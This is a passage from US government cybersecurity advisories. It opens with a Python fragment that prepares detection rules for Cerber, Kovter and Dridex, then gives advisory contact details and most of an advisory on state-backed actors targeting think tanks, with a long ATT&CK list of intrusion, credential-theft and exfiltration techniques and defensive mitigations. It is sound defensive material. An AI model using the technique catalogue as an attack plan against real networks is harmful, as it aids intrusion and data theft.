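    rules, problems, config = prepare_rules(SAMPLE_RULES)
    print("\n".join(config))       # goes into classification.config
    print("\n".join(rules))        # goes into local.rules
    for head, issues in problems:
        print("REJECTED", head, issues)
```

<p>The config lines go into <code>classification.config</code> and the prepared rules into <code>local.rules</code>; anything in the problems list still needs a human. Using one flowbit prefix per advisory keeps the Cerber, Kovter and Dridex tag rules from reading each other's state once all four are loaded together.</p>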
<h3>Contact Information</h3><p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href="https://www.fbi.gov/contact-us/field-offices">www.fbi.gov/contact-us/field-offices</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting organization; and a designated point of contact.</p>
<p>To request incident response resources or technical assistance related to these threats, contact CISA at <a href="mailto:Central@cisa.gov">Central@cisa.gov</a>.</p>
<h3>Resources</h3>
<p>MS-ISAC membership is open to employees or representatives from all public K-12 education entities in the United States. The MS-ISAC provides multiple cybersecurity services and benefits to help K-12 education entities increase their cybersecurity posture. To join, visit <a href="https://learn.cisecurity.org/ms-isac-registration">https://learn.cisecurity.org/ms-isac-registration</a>.</p>
<ul>
<li><a href="https://www.cisa.gov/telework">CISA Telework Guidance and Resources</a></li>
<li><a href="https://www.cisa.gov/publication/secure-video-conferencing-schools">CISA Cybersecurity Recommendations and Tips for Schools Using Video Conferencing</a></li>
<li><a href="https://us-cert.cisa.gov/Ransomware">CISA Ransomware Publications</a></li>
<li><a href="https://www.cisa.gov/emergency-services-sector-continuity-planning-suite">CISA Emergency Services Sector Continuity Planning Suite</a></li>
<li><a href="https://www.cisa.gov/publication/ransomware-guide">CISA-MS-ISAC Joint Ransomware Guide</a></li>
<li><a href="https://us-cert.cisa.gov/ncas/tips/ST04-014">CISA Tip: Avoiding Social Engineering and Phishing Attacks</a></li>
<li><a href="https://www.us-cert.gov/ncas/tips/ST04-006">CISA Tip: Understanding Patches</a></li>
<li><a href="https://cyber.org/cybersafety">CISA and CYBER.ORG "Cyber Safety Video Series" for K-12 students and educators</a></li>
<li><a href="https://www.ic3.gov/media/2019/191002.aspx">FBI PSA: "High-Impact Ransomware Attacks Threaten U.S. Businesses and Organizations"</a></li>
</ul>
<p><strong>Note: </strong>contact your local FBI field office (<a href="http://www.fbi.gov/contact-us/field">www.fbi.gov/contact-us/field</a>) for additional FBI products on ransomware, edtech, and cybersecurity for educational institutions.</p>
<h3>Revisions</h3>
<ul> <li>Initial Version: December 10, 2020</li> </ul>
<hr />
<div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a href="https://www.dhs.gov/privacy-policy">Privacy & Use</a> policy.</p>
</div>
AA20-336A: Advanced Persistent Threat Actors Targeting U.S. Think Tanks
Original release date: December 1, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the <a href="https://attack.mitre.org/versions/v7/techniques/enterprise/">ATT&CK for Enterprise</a> for all referenced threat actor tactics and techniques.</em></p>
<p>The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have observed continued cyber intrusions by advanced persistent threat (APT) actors targeting U.S. think tanks. This malicious activity is often, but not exclusively, directed at individuals and organizations that focus on international affairs or national security policy.[<a href="https://www.cyberscoop.com/european-think-tanks-hack-microsoft-fancy-bear-russia/">1</a>] The following guidance may assist U.S. think tanks in developing network defense procedures to prevent or rapidly detect these attacks.</p>
<p>APT actors have relied on multiple avenues for initial access. These have included low-effort capabilities such as spearphishing emails and third-party message services directed at both corporate and personal accounts, as well as exploiting vulnerable web-facing devices and remote connection capabilities. Increased telework during the COVID-19 pandemic has expanded workforce reliance on remote connectivity, affording malicious actors more opportunities to exploit those connections and to blend in with increased traffic. Attackers may leverage virtual private networks (VPNs) and other remote work tools to gain initial access or persistence on a victim’s network. When successful, these low-effort, high-reward approaches allow threat actors to steal sensitive information, acquire user credentials, and gain persistent access to victim networks.</p>
<p>Given the importance that think tanks can have in shaping U.S. policy, CISA and FBI urge individuals and organizations in the international affairs and national security sectors to immediately adopt a heightened state of awareness and implement the critical steps listed in the Mitigations section of this Advisory.</p>
<p><a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-336A-APT_Actors_Targeting_US_ThinkTanks.pdf">Click here</a> for a PDF version of this report.</p>
<h3>Technical Details</h3><h4>ATT&CK Profile</h4>
<p>CISA created the following MITRE ATT&CK profile to provide a non-exhaustive list of tactics, techniques, and procedures (TTPs) employed by APT actors to break through think tanks’ defenses, conduct reconnaissance in their environments, exfiltrate proprietary or confidential information, and execute effects on targets. These TTPs were included based upon closed reporting on APT actors that are known to target think tanks or based upon CISA incident response data.</p>
<ul>
<li><em><strong>Initial Access</strong></em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0001">TA0001</a>]
<ul>
<li><i>Valid Accounts </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1078/">T1078</a>]</li>
<li><i>Valid Accounts: Cloud Accounts </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1078/004/">T1078.004</a>]</li>
<li><i>External Remote Services </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1133/">T1133</a>]</li>
<li><i>Drive-by Compromise</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1189">T1189</a>]</li>
<li><i>Exploit Public-Facing Application</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1190">T1190</a>]</li>
<li><i>Supply Chain Compromise: Compromise Software Supply Chain</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1195/002">T1195.002</a>]</li>
<li><i>Trusted Relationship</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1199">T1199</a>]</li>
<li><i>Phishing: Spearphishing Attachment</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/001">T1566.001</a>]</li>
<li><i>Phishing: Spearphishing Link</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/002">T1566.002</a>]</li>
<li><i>Phishing: Spearphishing via Service</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1566/003">T1566.003</a>]</li>
</ul>
</li>
<li><em><strong>Execution</strong></em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0002">TA0002</a>]
<ul>
<li><i>Windows Management Instrumentation </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1047">T1047</a>]</li>
<li><i>Scheduled Task/Job: Scheduled Task </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1053/005">T1053.005</a>]</li>
<li><i>Command and Scripting Interpreter: PowerShell </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1059/001">T1059.001</a>]</li>
<li><i>Command and Scripting Interpreter: Windows Command Shell</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1059/003">T1059.003</a>]</li>
<li><i>Command and Scripting Interpreter: Unix Shell</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1059/004">T1059.004</a>]</li>
<li><i>Command and Scripting Interpreter: Visual Basic </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1059/005">T1059.005</a>]</li>
<li><i>Command and Scripting Interpreter: Python </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1059/006">T1059.006</a>]</li>
<li><i>Native API </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1106">T1106</a>]</li>
<li><i>Exploitation for Client Execution</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1203">T1203</a>]</li>
<li><i>User Execution: Malicious Link </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1204/001">T1204.001</a>]</li>
<li><i>User Execution: Malicious File</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1204/002">T1204.002</a>]</li>
<li><i>Inter-Process Communication: Dynamic Data Exchange </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1559/002/">T1559.002</a>]</li>
<li><i>System Services: Service Execution </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1569/002">T1569.002</a>]</li>
</ul>
</li>
<li><em><strong>Persistence</strong></em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0003">TA0003</a>]
<ul>
<li><i>Boot or Logon Initialization Scripts: Logon Script (Windows)</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1037/001">T1037.001</a>]</li>
<li><i>Scheduled Task/Job: Scheduled Task</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1053/005">T1053.005</a>]</li>
<li><i>Account Manipulation: Exchange Email Delegate Permissions </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1098/002">T1098.002</a>]</li>
<li><i>Create Account: Local Account</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1136/001">T1136.001</a>]</li>
<li><i>Office Application Startup: Office Test </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1137/002">T1137.002</a>]</li>
<li><i>Office Application Startup: Outlook Home Page</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1137/004">T1137.004</a>]</li>
<li><i>Browser Extensions</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1176">T1176</a>]</li>
<li><i>BITS Jobs</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1197/">T1197</a>]</li>
<li><i>Server Software Component: Web Shell</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1505/003">T1505.003</a>]</li>
<li><i>Pre-OS Boot: Bootkit</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1542/003/">T1542.003</a>]</li>
<li><i>Create or Modify System Process: Windows Service</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1543/003">T1543.003</a>]</li>
<li><i>Event Triggered Execution: Change Default File Association</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1546/001">T1546.001</a>]</li>
<li><i>Event Triggered Execution: Windows Management Instrumentation Event Subscription </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1546/003">T1546.003</a>]</li>
<li><i>Event Triggered Execution: Accessibility Features</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1546/008">T1546.008</a>]</li>
<li><i>Event Triggered Execution: Component Object Model Hijacking</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1546/015">T1546.015</a>]</li>
<li><i>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1547/001">T1547.001</a>]</li>
<li><i>Boot or Logon Autostart Execution: Shortcut Modification</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1547/009">T1547.009</a>]</li>
</ul>
</li>
<li><em><strong>Privilege Escalation</strong></em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0004">TA0004</a>]
<ul>
<li><i>Process Injection</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1055">T1055</a>]</li>
<li><i>Process Injection: Process Hollowing</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1055/012">T1055.012</a>]</li>
<li><i>Exploitation for Privilege Escalation</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1068">T1068</a>]</li>
<li><i>Access Token Manipulation: Token Impersonation/Theft</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1134/001">T1134.001</a>]</li>
<li><i>Event Triggered Execution: Accessibility Features </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1546/008">T1546.008</a>]</li>
<li><i>Boot or Logon Autostart Execution: Shortcut Modification</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1547/009">T1547.009</a>]</li>
<li><i>Abuse Elevation Control Mechanism: Bypass User Access Control</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1548/002">T1548.002</a>]</li>
<li><i>Hijack Execution Flow: DLL Side-Loading</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1574/002">T1574.002</a>]</li>
</ul>
</li>
<li><em><strong>Defense Evasion</strong></em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0005">TA0005</a>]
<ul>
<li><i>Rootkit</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1014">T1014</a>]</li>
<li><i>Obfuscated Files or Information: Binary Padding </i>[<a href="https://attack.mitre.org/versions/v7/techniques/T1027/001">T1027.001</a>]</li>
<li><i>Obfuscated Files or Information: Software Packing </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1027/002″>T1027.002</a>]</li>
<li><i>Obfuscated Files or Information: Steganography</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1027/003″>T1027.003</a>]</li>
<li><i>Obfuscated Files or Information: Indicator Removal from Tools</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1027/005″>T1027.005</a>]</li>
<li><i>Masquerading: Match Legitimate Name or Location</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1036/005″>T1036.005</a>]</li>
<li><i>Indicator Removal on Host: Clear Windows Event Logs</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1070/001″>T1070.001</a>]</li>
<li><i>Indicator Removal on Host: Clear Command History</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1070/003">T1070.003</a>]</li>
<li><i>Indicator Removal on Host: File Deletion</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1070/004″>T1070.004</a>]</li>
<li><i>Indicator Removal on Host: Timestomp</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1070/006″>T1070.006</a>]</li>
<li><i>Modify Registry</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1112″>T1112</a>]</li>
<li><i>Deobfuscate/Decode Files or Information </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1140″>T1140</a>]</li>
<li><i>Exploitation for Defense Evasion</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1211″>T1211</a>]</li>
<li><i>Signed Binary Proxy Execution: Compiled HTML File</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1218/001″>T1218.001</a>]</li>
<li><i><em>Signed Binary Proxy Execution: Mshta</em></i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1218/005″>T1218.005</a>]</li>
<li><i>Signed Binary Proxy Execution:<em> Rundll32 </em></i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1218/011″>T1218.011</a>]</li>
<li><i>Template Injection</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1221″>T1221</a>]</li>
<li><i>Execution Guardrails: Environmental Keying</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1480/001″>T1480.001</a>]</li>
<li><i>Abuse Elevation Control Mechanism: Bypass User Access Control</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1548/002″>T1548.002</a>]</li>
<li><i>Use Alternate Authentication Material: Application Access Token</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1550/001″>T1550.001</a>]</li>
<li><i>Subvert Trust Controls: Code Signing</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1553/002″>T1553.002</a>]</li>
<li><i>Impair Defenses: Disable or Modify Tools</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1562/001″>T1562.001</a>]</li>
<li><i>Impair Defenses: Disable or Modify System Firewall</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1562/004″>T1562.004</a>]</li>
<li><i>Hide Artifacts: Hidden Files and Directories </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1564/001″>T1564.001</a>]</li>
<li><i>Hide Artifacts: Hidden Window</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1564/003″>T1564.003</a>]</li>
</ul>
</li>
<li><i><em><strong>Credential Access</strong></em> </i>[<a href=”https://attack.mitre.org/versions/v7/tactics/TA0006″>TA0006</a>]
<ul>
<li><i>OS Credential Dumping: LSASS Memory</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1003/001″>T1003.001</a>]</li>
<li><i>OS Credential Dumping: Security Account Manager </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1003/002″>T1003.002</a>]</li>
<li><i>OS Credential Dumping: NTDS</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1003/003″>T1003.003</a>]</li>
<li><i>OS Credential Dumping: LSA Secrets</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1003/004″>T1003.004</a>]</li>
<li><i>OS Credential Dumping: Cached Domain Credentials</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1003/005″>T1003.005</a>]</li>
<li><i>Network Sniffing</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1040″>T1040</a>]</li>
<li><i>Input Capture: Keylogging</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1056/001″>T1056.001</a>]</li>
<li><i>Brute Force: Password Cracking</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1110/002">T1110.002</a>]</li>
<li><i>Brute Force: Password Spraying</i> [<a href="https://attack.mitre.org/versions/v7/techniques/T1110/003">T1110.003</a>]</li>
<li><i>Forced Authentication</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1187″>T1187</a>]</li>
<li><i>Steal Application Access Token</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1528″>T1528</a>]</li>
<li><i>Unsecured Credentials: Credentials in Files</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1552/001″>T1552.001</a>]</li>
<li><i>Unsecured Credentials: Group Policy Preferences</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1552/006″>T1552.006</a>]</li>
<li><i>Credentials from Password Stores: Credentials from Web Browsers</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1555/003″>T1555.003</a>]</li>
</ul>
</li>
<li><i><em><strong>Discovery</strong></em> </i>[<a href=”https://attack.mitre.org/versions/v7/tactics/TA0007″>TA0007</a>]
<ul>
<li><i>System Service Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1007″>T1007</a>]</li>
<li><i>Query Registry</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1012″>T1012</a>]</li>
<li><i>System Network Configuration Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1016″>T1016</a>]</li>
<li><i>Remote System Discovery </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1018″>T1018</a>]</li>
<li><i>System Owner/User Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1033″>T1033</a>]</li>
<li><i>Network Sniffing</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1040″>T1040</a>]</li>
<li><i>Network Service Scanning</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1046″>T1046</a>]</li>
<li><i>System Network Connections Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1049″>T1049</a>]</li>
<li><i>Process Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1057″>T1057</a>]</li>
<li><i>Permission Groups Discovery: Local Groups</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1069/001″>T1069.001</a>]</li>
<li><i>Permission Groups Discovery: Domain Groups</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1069/002″>T1069.002</a>]</li>
<li><i>System Information Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1082″>T1082</a>]</li>
<li><i>File and Directory Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1083″>T1083</a>]</li>
<li><i>Account Discovery: Local Account</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1087/001″>T1087.001</a>]</li>
<li><i>Account Discovery: Domain Account</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1087/002″>T1087.002</a>]</li>
<li><i>Peripheral Device Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1120″>T1120</a>]</li>
<li><i>Network Share Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1135″>T1135</a>]</li>
<li><i>Password Policy Discovery </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1201/”>T1201</a>]</li>
<li><i>Software Discovery: Security Software Discovery</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1518/001″>T1518.001</a>]</li>
</ul>
</li>
<li><i><em><strong>Lateral Movement </strong></em></i>[<a href=”https://attack.mitre.org/versions/v7/tactics/TA0008″>TA0008</a>]
<ul>
<li><i>Remote Services: Remote Desktop Protocol</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1021/001″>T1021.001</a>]</li>
<li><i>Remote Services: SSH </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1021/004″>T1021.004</a>]</li>
<li><i>Taint Shared Content </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1080/”>T1080</a>]</li>
<li><i>Replication Through Removable Media </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1091″>T1091</a>]</li>
<li><i>Exploitation of Remote Services</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1210″>T1210</a>]</li>
<li><i>Use Alternate Authentication Material: Pass the Hash </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1550/002″>T1550.002</a>]</li>
<li><i>Use Alternate Authentication Material: Pass the Ticket</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1550/003″>T1550.003</a>]</li>
</ul>
</li>
<li><i><em><strong>Collection</strong></em></i> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0009″>TA0009</a>]
<ul>
<li><i>Data from Local System</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1005″>T1005</a>]</li>
<li><i>Data from Removable Media</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1025″>T1025</a>]</li>
<li><i>Data Staged: Local Data Staging</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1074/001″>T1074.001</a>]</li>
<li><i>Screen Capture</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1113″>T1113</a>]</li>
<li><i>Email Collection: Local Email Collection</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1114/001″>T1114.001</a>]</li>
<li><i>Email Collection: Remote Email Collection</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1114/002″>T1114.002</a>]</li>
<li><i>Automated Collection</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1119″>T1119</a>]</li>
<li><i>Audio Capture</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1123″>T1123</a>]</li>
<li><i>Data from Information Repositories: SharePoint </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1213/002″>T1213.002</a>]</li>
<li><i>Archive Collected Data: Archive via Utility</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1560/001″>T1560.001</a>]</li>
<li><i>Archive Collected Data: Archive via Custom Method</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1560/003″>T1560.003</a>]</li>
</ul>
</li>
<li><i><em><strong>Command and Control</strong></em> </i>[<a href=”https://attack.mitre.org/versions/v7/tactics/TA0011″>TA0011</a>]
<ul>
<li><i>Data Obfuscation: Junk Data</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1001/001/”>T1001.001</a>]</li>
<li><i>Fallback Channels</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1008″>T1008</a>]</li>
<li><i>Application Layer Protocol: Web Protocols</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1071/001″>T1071.001</a>]</li>
<li><i>Application Layer Protocol: File Transfer Protocols</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1071/002″>T1071.002</a>]</li>
<li><i>Application Layer Protocol: Mail Protocols</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1071/003″>T1071.003</a>]</li>
<li><i>Application Layer Protocol: DNS</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1071/004″>T1071.004</a>]</li>
<li><i>Proxy: External Proxy</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1090/002″>T1090.002</a>]</li>
<li><i>Proxy: Multi-hop Proxy</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1090/003″>T1090.003</a>]</li>
<li><i>Proxy: Domain Fronting</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1090/004″>T1090.004</a>]</li>
<li><i>Communication Through Removable Media</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1092″>T1092</a>]</li>
<li><i>Non-Application Layer Protocol</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1095″>T1095</a>]</li>
<li><i>Web Service: Dead Drop Resolver</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1102/001″>T1102.001</a>]</li>
<li><i>Web Service: Bidirectional Communication</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1102/002″>T1102.002</a>]</li>
<li><i>Multi-Stage Channels</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1104″>T1104</a>]</li>
<li><i>Ingress Tool Transfer</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1105″>T1105</a>]</li>
<li><i>Data Encoding: Standard Encoding</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1132/001″>T1132.001</a>]</li>
<li><i>Remote Access Software</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1219″>T1219</a>]</li>
<li><i>Dynamic Resolution: Domain Generation Algorithms</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1568/002″>T1568.002</a>]</li>
<li><i>Non-Standard Port</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1571″>T1571</a>]</li>
<li><i>Protocol Tunneling</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1572″>T1572</a>]</li>
<li><i>Encrypted Channel: Symmetric Cryptography</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1573/001″>T1573.001</a>]</li>
<li><i>Encrypted Channel: Asymmetric Cryptography</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1573/002″>T1573.002</a>]</li>
</ul>
</li>
<li><i><em><strong>Exfiltration</strong></em></i> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0010">TA0010</a>]
<ul>
<li><i>Exfiltration Over C2 Channel</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1041″>T1041</a>]</li>
<li><i>Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1048/003″>T1048.003</a>]</li>
</ul>
</li>
<li><i><em><strong>Impact </strong></em></i>[<a href=”https://attack.mitre.org/versions/v7/tactics/TA0040″>TA0040</a>]
<ul>
<li><i>Data Encrypted for Impact</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1486″>T1486</a>]</li>
<li><i>Resource Hijacking</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1496″>T1496</a>]</li>
<li><i>System Shutdown/Reboot</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1529″>T1529</a>]</li>
<li><i>Disk Wipe: Disk Structure Wipe</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1561/002″>T1561.002</a>]</li>
</ul>
</li>
</ul>
<h3>Mitigations</h3><p>CISA and FBI recommend think tank organizations apply the following critical practices to strengthen their security posture.</p>
<h4>Leaders</h4>
<ul>
<li>Implement a training program to familiarize users with identifying social engineering techniques and phishing emails.</li>
</ul>
<h4>Users/Staff</h4>
<ul>
<li>Log off remote connections when not in use.</li>
<li>Be vigilant against tailored spearphishing attacks targeting corporate and personal accounts (including both email and social media accounts).</li>
<li>Use different passwords for corporate and personal accounts.</li>
<li>Install antivirus software on personal devices to automatically scan and quarantine suspicious files.</li>
<li>Employ strong multi-factor authentication for personal accounts, if available.</li>
<li>Exercise caution when:
<ul>
<li>Opening email attachments, even if the attachment is expected and the sender appears to be known. See <a href=”https://www.us-cert.gov/ncas/tips/ST04-010″>Using Caution with Email Attachments</a>.</li>
<li>Using removable media (e.g., USB thumb drives, external drives, CDs).</li>
</ul>
</li>
</ul>
<h4>IT Staff/Cybersecurity Personnel</h4>
<ul>
<li>Segment and segregate networks and functions.</li>
<li>Change the default username and password of applications and appliances.</li>
<li>Employ strong multi-factor authentication for corporate accounts.</li>
<li>Deploy antivirus software on organizational devices to automatically scan and quarantine suspicious files.</li>
<li>Apply encryption to data at rest and data in transit.</li>
<li>Use email security appliances to scan and remove malicious email attachments or links.</li>
<li>Monitor key internal security tools and identify anomalous behavior. Flag any known indicators of compromise or threat actor behaviors for immediate response.</li>
<li>Organizations can implement mitigations of varying complexity and restrictiveness to reduce the risk posed by threat actors who use Tor (The Onion Router) to carry out malicious activities. See the CISA-FBI Joint Cybersecurity Advisory on <a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-183a”>Defending Against Malicious Cyber Activity Originating from Tor</a> for mitigation options and additional information.</li>
<li>Prevent exploitation of known software vulnerabilities by routinely applying software patches and upgrades. Foreign cyber threat actors continue to exploit publicly known—and often dated—software vulnerabilities against broad target sets, including public and private sector organizations. If these vulnerabilities are left unpatched, exploitation often requires few resources and provides threat actors with easy access to victim networks. Review CISA and FBI’s <a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-133a”>Top 10 Routinely Exploited Vulnerabilities</a> and other CISA alerts that identify vulnerabilities exploited by foreign attackers.</li>
<li>Implement an antivirus program and a formalized patch management process.</li>
<li>Block certain websites and email attachments commonly associated with malware (e.g., .scr, .pif, .cpl, .dll, .exe).</li>
<li>Block email attachments that cannot be scanned by antivirus software (e.g., .zip files).</li>
<li>Implement Group Policy Object and firewall rules.</li>
<li>Implement filters at the email gateway and block suspicious IP addresses at the firewall.</li>
<li>Routinely audit domain and local accounts as well as their permission levels to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account.</li>
<li>Follow best practices for design and administration of the network to limit privileged account use across administrative tiers.</li>
